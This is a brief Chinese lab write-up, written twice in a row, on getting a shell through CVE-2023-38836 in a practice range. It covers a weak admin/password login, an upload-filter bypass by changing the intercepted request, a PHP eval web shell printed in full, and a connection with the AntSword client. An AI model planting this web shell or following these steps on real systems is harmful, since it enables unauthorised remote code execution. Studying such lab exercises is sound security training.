春秋云镜CVE-2023-38836
打开靶场环境
点击发现一个登陆框,弱口令试一下
发现账号密码为admin,password
随便点击点击
Media发现这里可以上传文件上传木马试试
<?php @eval($_POST["wjq"]); ?>
发现不能上传php文件
php内容
修改他的格式
抓包绕过一下
302就可以其实已经写进去了点一下4.php的view复制路径
蚁剑远程连接
获得shell
打开靶场环境
点击发现一个登陆框,弱口令试一下
发现账号密码为admin,password
随便点击点击
Media发现这里可以上传文件上传木马试试
<?php @eval($_POST["wjq"]); ?>
发现不能上传php文件
php内容
修改他的格式
抓包绕过一下
302就可以其实已经写进去了点一下4.php的view复制路径
蚁剑远程连接
获得shell